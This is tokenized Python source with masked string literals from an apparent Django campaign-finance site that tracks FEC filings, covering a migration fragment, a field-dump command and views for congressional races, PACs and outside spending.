'<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from formdata . db_worker_settings import FIELDDIR_LOCATION <EOL> from formdata . models import * <EOL> def list_db_fields_from_model ( this_model ) : <EOL> """<STR_LIT>""" <EOL> field_list = [ ] <EOL> for field in this_model . _meta . fields : <EOL> if not field . auto_created : <EOL> field_list . append ( field . column ) <EOL> return sorted ( field_list ) <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> requires_model_validation = False <EOL> def handle ( self , * args , ** options ) : <EOL> fields = { } <EOL> fields [ '<STR_LIT:A>' ] = list_db_fields_from_model ( SkedA ) <EOL> fields [ '<STR_LIT:B>' ] = list_db_fields_from_model ( SkedB ) <EOL> fields [ '<STR_LIT:E>' ] = list_db_fields_from_model ( SkedE ) <EOL> fields [ '<STR_LIT:O>' ] = list_db_fields_from_model ( OtherLine ) <EOL> timestamp = datetime . datetime . now ( ) . strftime ( '<STR_LIT>' ) <EOL> field_def_file = open ( FIELDDIR_LOCATION , '<STR_LIT:w>' ) <EOL> field_def_file . write ( "<STR_LIT>" % timestamp ) <EOL> field_def_file . write ( "<STR_LIT>" % str ( fields ) ) <EOL> field_def_file . close ( ) </s>
<s> # Auto-generated snapshot of DB column names per schedule (written by the dump command above); keys are schedule letters, values are sorted column-name lists -- do not edit by hand. <EOL> fields = { '<STR_LIT:A>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:E>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:O>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } </s>
<s> import datetime <EOL> from django . shortcuts import get_object_or_404 , render_to_response <EOL> from django . db import connection <EOL> from django . db . models import Q <EOL> from django . template import RequestContext <EOL> from django . shortcuts import redirect <EOL> from django . contrib . localflavor . us . us_states import US_STATES <EOL> from django . db . models import Sum <EOL> from django . http import Http404 <EOL> from fec_alerts . models import new_filing , newCommittee , f1filer <EOL> from summary_data . models import Candidate_Overlay , District , Committee_Overlay , Committee_Time_Summary , Authorized_Candidate_Committees , Pac_Candidate , DistrictWeekly <EOL> from shared_utils . cycle_utils import get_cycle_abbreviation , is_valid_four_digit_string_cycle , get_cycle_endpoints , list_2014_only , list_2016_only , cycle_fake <EOL> this_cycle = '<STR_LIT>' <EOL> this_cycle_start = datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> from formdata . models import SkedA , SkedB , SkedE <EOL> from summary_data . utils . summary_utils import map_summary_form_to_dict <EOL> from django . conf import settings <EOL> from summary_data . utils . update_utils import get_update_time <EOL> from summary_data . utils . weekly_update_utils import get_week_number , get_week_start , get_week_end <EOL> from summary_data . election_dates import elections_by_day <EOL> from summary_data . management . commands . write_weekly_files import data_series as weekly_dump_data_series <EOL> from summary_data . utils . chart_reference import chart_name_reference , chart_donor_name_reference <EOL> from django . views . decorators . cache import cache_page , cache_control <EOL> STATE_LIST = [ { '<STR_LIT:name>' : x [ <NUM_LIT:1> ] , '<STR_LIT>' : x [ <NUM_LIT:0> ] } for x in US_STATES ] <EOL> try : <EOL> PAGINATE_BY = settings . 
REST_FRAMEWORK [ '<STR_LIT>' ] <EOL> except : <EOL> print "<STR_LIT>" <EOL> PAGINATE_BY = <NUM_LIT:100> <EOL> try : <EOL> BULK_EXPORT_KEY = settings . BULK_EXPORT_KEY <EOL> except AttributeError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> LONG_CACHE_TIME = settings . LONG_CACHE_TIME <EOL> SHORT_CACHE_TIME = settings . SHORT_CACHE_TIME <EOL> except AttributeError : <EOL> print "<STR_LIT>" <EOL> LONG_CACHE_TIME = <NUM_LIT> <EOL> SHORT_CACHE_TIME = <NUM_LIT:30> <EOL> try : <EOL> CURRENT_CYCLE = settings . CURRENT_CYCLE <EOL> except : <EOL> print "<STR_LIT>" <EOL> CURRENT_CYCLE = '<STR_LIT>' <EOL> def newbase ( request ) : <EOL> return render_to_response ( '<STR_LIT>' , { } , context_instance = RequestContext ( request ) ) <EOL> def home_page ( request ) : <EOL> return redirect ( '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def senate ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> title = "<STR_LIT>" <EOL> explanatory_text = "<STR_LIT>" <EOL> districts = District . objects . filter ( office = '<STR_LIT:S>' , cycle = cycle ) <EOL> legislators = Candidate_Overlay . objects . filter ( office = '<STR_LIT:S>' , cycle = cycle ) . filter ( Q ( cash_on_hand__gte = <NUM_LIT:1000> ) | Q ( is_incumbent = True ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> districts = District . objects . 
filter ( office = '<STR_LIT:H>' , cycle = cycle ) <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : legislators , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def senate_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def house ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> title = "<STR_LIT>" <EOL> explanatory_text = "<STR_LIT>" <EOL> legislators = Candidate_Overlay . objects . filter ( office = '<STR_LIT:H>' , cycle = cycle ) . filter ( Q ( cash_on_hand__gte = <NUM_LIT:1000> ) | Q ( is_incumbent = True ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> districts = District . objects . 
filter ( office = '<STR_LIT:H>' , cycle = cycle ) <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : legislators , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def house_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def races ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> title = "<STR_LIT>" % ( cycle ) <EOL> explanatory_text = "<STR_LIT>" <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> districts = District . objects . filter ( cycle = cycle ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def races_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> def race_id_redirect ( request , race_id ) : <EOL> race = get_object_or_404 ( District , pk = race_id ) <EOL> return redirect ( race . 
get_absolute_url ( ) ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def house_race ( request , cycle , state , district ) : <EOL> race = get_object_or_404 ( District , cycle = cycle , state = state , office_district = district , office = '<STR_LIT:H>' ) <EOL> title = race . race_name ( ) <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . filter ( Q ( total_receipts__gte = <NUM_LIT:1000> ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate__in = candidates , total_ind_exp__gte = <NUM_LIT> ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidate_list = [ x . get ( '<STR_LIT>' ) for x in candidates . values ( '<STR_LIT>' ) ] <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> recent_ies = SkedE . objects . filter ( candidate_id_checked__in = candidate_list , expenditure_amount__gte = <NUM_LIT:1000> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> committees = Committee_Overlay . objects . filter ( curated_candidate__in = candidates ) <EOL> committee_ids = [ x . get ( '<STR_LIT>' ) for x in committees . values ( '<STR_LIT>' ) ] <EOL> recent_filings = new_filing . objects . filter ( fec_id__in = committee_ids , is_superceded = False ) . exclude ( coverage_to_date__isnull = True ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> cycle_values = District . objects . filter ( state = state , office_district = district , office = '<STR_LIT:H>' ) . 
exclude ( cycle = cycle ) <EOL> cycle_list = [ race ] + list ( cycle_values ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : race , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : recent_filings , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def presidential_race ( request ) : <EOL> race = get_object_or_404 ( District , cycle = CURRENT_CYCLE , office = '<STR_LIT:P>' ) <EOL> title = "<STR_LIT>" <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . filter ( Q ( total_receipts__gte = <NUM_LIT> ) | Q ( total_expenditures__gte = <NUM_LIT> ) ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate__in = candidates , total_ind_exp__gte = <NUM_LIT> ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidate_list = [ x . get ( '<STR_LIT>' ) for x in candidates . values ( '<STR_LIT>' ) ] <EOL> cycle_endpoints = get_cycle_endpoints ( int ( CURRENT_CYCLE ) ) <EOL> recent_ies = SkedE . objects . filter ( candidate_id_checked__in = candidate_list , expenditure_amount__gte = <NUM_LIT> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> committees = Committee_Overlay . objects . filter ( curated_candidate__in = candidates ) <EOL> committee_ids = [ x . get ( '<STR_LIT>' ) for x in committees . values ( '<STR_LIT>' ) ] <EOL> recent_filings = new_filing . objects . filter ( fec_id__in = committee_ids , is_superceded = False ) . exclude ( coverage_to_date__isnull = True ) . 
order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> cycle_list = list_2016_only <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : race , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : recent_filings , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def senate_race ( request , cycle , state , term_class ) : <EOL> race = get_object_or_404 ( District , cycle = cycle , state = state , term_class = term_class , office = '<STR_LIT:S>' ) <EOL> title = race . race_name ( ) <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . filter ( Q ( total_receipts__gte = <NUM_LIT:1000> ) | Q ( total_expenditures__gte = <NUM_LIT:1000> ) ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate__in = candidates , total_ind_exp__gte = <NUM_LIT> ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidate_list = [ x . get ( '<STR_LIT>' ) for x in candidates . values ( '<STR_LIT>' ) ] <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> recent_ies = SkedE . objects . filter ( candidate_id_checked__in = candidate_list , expenditure_amount__gte = <NUM_LIT:1000> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:5> ] <EOL> cycle_values = District . objects . filter ( state = state , term_class = term_class , office = '<STR_LIT:S>' ) . 
exclude ( cycle = cycle ) <EOL> cycle_list = [ race ] + list ( cycle_values ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : race , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def newest_filings ( request ) : <EOL> candidates = Candidate_Overlay . objects . filter ( office__in = [ '<STR_LIT:H>' , '<STR_LIT:P>' ] , cycle = CURRENT_CYCLE ) . order_by ( '<STR_LIT:name>' ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def pacs ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : cycle_list <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def pacs_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_control ( no_cache = True ) <EOL> def outside_spenders ( request , cycle ) : <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , 
cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> explanatory_text = "<STR_LIT>" % cycle <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT:title>' : "<STR_LIT>" % cycle , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : cycle_list , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def outside_spenders_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> @ cache_control ( no_cache = True ) <EOL> def dynamic_ies ( request ) : <EOL> districts = District . objects . filter ( outside_spending__gt = <NUM_LIT:1000> ) . order_by ( '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> candidates = Candidate_Overlay . objects . filter ( total_expenditures__gt = <NUM_LIT:1> ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) <EOL> outside_spenders = Committee_Overlay . objects . filter ( total_indy_expenditures__gte = <NUM_LIT:1000> ) . order_by ( '<STR_LIT:name>' ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : STATE_LIST , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PAGINATE_BY , <EOL> '<STR_LIT>' : districts , <EOL> '<STR_LIT>' : candidates , <EOL> '<STR_LIT>' : outside_spenders , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def new_committees ( request ) : <EOL> today = datetime . datetime . today ( ) <EOL> month_ago = today - datetime . timedelta ( days = <NUM_LIT:30> ) <EOL> committees = f1filer . objects . filter ( receipt_dt__gte = month_ago ) . 
order_by ( '<STR_LIT>' ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : committees , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def render_blank_page ( title , explanatory_text , request ) : <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def downloads_redirect ( request ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> def downloads ( request , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> other_year = None <EOL> if cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> elif cycle == '<STR_LIT>' : <EOL> other_year = '<STR_LIT>' <EOL> cycle_list = [ cycle_fake ( cycle , "<STR_LIT>" % cycle ) , cycle_fake ( other_year , "<STR_LIT>" % other_year ) ] <EOL> title = "<STR_LIT>" <EOL> update_time = get_update_time ( BULK_EXPORT_KEY ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : cycle , <EOL> '<STR_LIT>' : cycle_list , <EOL> '<STR_LIT>' : update_time , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def about ( request ) : <EOL> title = "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def outside_spending ( request ) : <EOL> title = "<STR_LIT>" <EOL> explanatory_text = "<STR_LIT>" <EOL> ies = SkedE . objects . filter ( superceded_by_amendment = False , expenditure_amount__gte = <NUM_LIT> , expenditure_date_formatted__gte = datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . select_related ( '<STR_LIT>' , '<STR_LIT>' ) . 
